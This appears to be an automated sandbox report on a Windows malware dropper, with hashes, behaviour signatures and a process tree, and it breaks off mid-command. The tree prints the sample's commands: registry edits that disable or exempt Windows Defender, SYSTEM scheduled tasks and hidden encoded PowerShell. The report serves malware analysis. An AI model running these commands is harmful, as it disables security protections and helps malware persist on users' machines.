Analysis
-
max time kernel
91s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
04-11-2022 08:17
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
c104e431c084587ed2dc8c447b410c9c
-
SHA1
f92d07d0d6bdeb2de00828d89b826dd215192a04
-
SHA256
4346bb66ea4faac2c329b2cb9ed9f38e8f704baa5c7576295a526792bf007ace
-
SHA512
bd78250b14febf10fa80f2c47e823f6037e93b0e87f26934dfd1b49dae053961048c4bd5ef51f2c839d17ac050a861d6e87f5bab592306103f256ec724eb1eba
-
SSDEEP
196608:91O0BHMSmQg+se1Ysn2uLGWDyJUn5XFi87iW:3O0BsSmQnz1vnBKWmOnHR7J
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 54 5044 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1264 Install.exe 4808 Install.exe 4204 DdGsvFD.exe 4692 hyRojpn.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hyRojpn.exe -
Loads dropped DLL 1 IoCs
pid Process 5044 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json hyRojpn.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini hyRojpn.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content hyRojpn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hyRojpn.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini DdGsvFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 hyRojpn.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 hyRojpn.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hyRojpn.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol DdGsvFD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F hyRojpn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 hyRojpn.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi hyRojpn.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hyRojpn.exe File created C:\Program Files (x86)\SnQMkCffU\myBRlhk.xml hyRojpn.exe File created C:\Program Files (x86)\PTcVEVWfzVfU2\wpdmoMeXnXsdY.dll hyRojpn.exe File created C:\Program Files (x86)\PTcVEVWfzVfU2\mvuHQDC.xml hyRojpn.exe File created C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\wEdWBaT.xml hyRojpn.exe File created C:\Program Files (x86)\nNoOyOjreWgVC\jWVtOmO.xml hyRojpn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hyRojpn.exe File created C:\Program Files (x86)\SnQMkCffU\pmMXXd.dll hyRojpn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi hyRojpn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja hyRojpn.exe File created C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\ysKRHlc.dll hyRojpn.exe File created C:\Program Files (x86)\nNoOyOjreWgVC\pgQIRoz.dll hyRojpn.exe File created C:\Program Files (x86)\XracVvRTBJUn\jPPpEPF.dll hyRojpn.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bmPPeHndeZJiZewMwY.job schtasks.exe File created C:\Windows\Tasks\VxfUuShlQNbdQSXLl.job schtasks.exe File created C:\Windows\Tasks\OwLyLJfWgdznQZv.job schtasks.exe File created C:\Windows\Tasks\UjaziEjLbJEPTlLHt.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2824 schtasks.exe 2552 schtasks.exe 3360 schtasks.exe 1588 schtasks.exe 1764 schtasks.exe 4968 schtasks.exe 2512 schtasks.exe 2296 schtasks.exe 3572 schtasks.exe 3884 schtasks.exe 3632 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} hyRojpn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" hyRojpn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" hyRojpn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3640 powershell.EXE 3640 powershell.EXE 2812 powershell.exe 2812 powershell.exe 4512 powershell.exe 4512 powershell.exe 2700 powershell.EXE 2700 powershell.EXE 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe 4692 hyRojpn.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3640 powershell.EXE Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe Token: SeDebugPrivilege 2700 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4440 wrote to memory of 1264 4440 file.exe 79 PID 4440 wrote to memory of 1264 4440 file.exe 79 PID 4440 wrote to memory of 1264 4440 file.exe 79 PID 1264 wrote to memory of 4808 1264 Install.exe 80 PID 1264 wrote to memory of 4808 1264 Install.exe 80 PID 1264 wrote to memory of 4808 1264 Install.exe 80 PID 4808 wrote to memory of 2968 4808 Install.exe 84 PID 4808 wrote to memory of 2968 4808 Install.exe 84 PID 4808 wrote to memory of 2968 4808 Install.exe 84 PID 4808 wrote to memory of 4752 4808 Install.exe 86 PID 4808 wrote to memory of 4752 4808 Install.exe 86 PID 4808 wrote to memory of 4752 4808 Install.exe 86 PID 2968 wrote to memory of 2296 2968 forfiles.exe 88 PID 2968 wrote to memory of 2296 2968 forfiles.exe 88 PID 2968 wrote to memory of 2296 2968 forfiles.exe 88 PID 4752 wrote to memory of 1296 4752 forfiles.exe 89 PID 4752 wrote to memory of 1296 4752 forfiles.exe 89 PID 4752 wrote to memory of 1296 4752 forfiles.exe 89 PID 1296 wrote to memory of 3792 1296 cmd.exe 91 PID 1296 wrote to memory of 3792 1296 cmd.exe 91 PID 1296 wrote to memory of 3792 1296 cmd.exe 91 PID 2296 wrote to memory of 2500 2296 cmd.exe 90 PID 2296 wrote to memory of 2500 2296 cmd.exe 90 PID 2296 wrote to memory of 2500 2296 cmd.exe 90 PID 2296 wrote to memory of 2892 2296 cmd.exe 92 PID 2296 wrote to memory of 2892 2296 cmd.exe 92 PID 2296 wrote to memory of 2892 2296 cmd.exe 92 PID 1296 wrote to memory of 1520 1296 cmd.exe 93 PID 1296 wrote to memory of 1520 1296 cmd.exe 93 PID 1296 wrote to memory of 1520 1296 cmd.exe 93 PID 4808 wrote to memory of 2824 4808 Install.exe 96 PID 4808 wrote to memory of 2824 4808 Install.exe 96 PID 4808 wrote to memory of 2824 4808 Install.exe 96 PID 4808 wrote to memory of 4092 4808 Install.exe 98 PID 4808 wrote to memory of 4092 4808 Install.exe 98 PID 4808 wrote to memory of 4092 4808 Install.exe 98 PID 3640 wrote to memory of 2376 3640 powershell.EXE 102 PID 3640 wrote to memory of 2376 3640 powershell.EXE 102 PID 4808 wrote to memory of 504 4808 Install.exe 110 PID 4808 wrote to memory of 504 4808 Install.exe 110 PID 4808 wrote to memory of 504 4808 Install.exe 110 PID 4808 wrote to memory of 1764 4808 Install.exe 112 PID 4808 wrote to memory of 1764 4808 Install.exe 112 PID 4808 wrote to memory of 1764 4808 Install.exe 112 PID 4204 wrote to memory of 2812 4204 DdGsvFD.exe 115 PID 4204 wrote to memory of 2812 4204 DdGsvFD.exe 115 PID 4204 wrote to memory of 2812 4204 DdGsvFD.exe 115 PID 2812 wrote to memory of 3776 2812 powershell.exe 117 PID 2812 wrote to memory of 3776 2812 powershell.exe 117 PID 2812 wrote to memory of 3776 2812 powershell.exe 117 PID 3776 wrote to memory of 1800 3776 cmd.exe 118 PID 3776 wrote to memory of 1800 3776 cmd.exe 118 PID 3776 wrote to memory of 1800 3776 cmd.exe 118 PID 2812 wrote to memory of 3588 2812 powershell.exe 119 PID 2812 wrote to memory of 3588 2812 powershell.exe 119 PID 2812 wrote to memory of 3588 2812 powershell.exe 119 PID 2812 wrote to memory of 2412 2812 powershell.exe 120 PID 2812 wrote to memory of 2412 2812 powershell.exe 120 PID 2812 wrote to memory of 2412 2812 powershell.exe 120 PID 2812 wrote to memory of 4328 2812 powershell.exe 121 PID 2812 wrote to memory of 4328 2812 powershell.exe 121 PID 2812 wrote to memory of 4328 2812 powershell.exe 121 PID 2812 wrote to memory of 2312 2812 powershell.exe 122 PID 2812 wrote to memory of 2312 2812 powershell.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\AppData\Local\Temp\7zSD287.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Users\Admin\AppData\Local\Temp\7zSDB03.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2500
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2892
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3792
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1520
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLNljdPJL" /SC once /ST 00:04:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLNljdPJL"4⤵PID:4092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLNljdPJL"4⤵PID:504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmPPeHndeZJiZewMwY" /SC once /ST 09:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe\" pT /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1764
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2376
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4228
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exeC:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\YjtjmvkzxwbTrRZ\DdGsvFD.exe pT /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 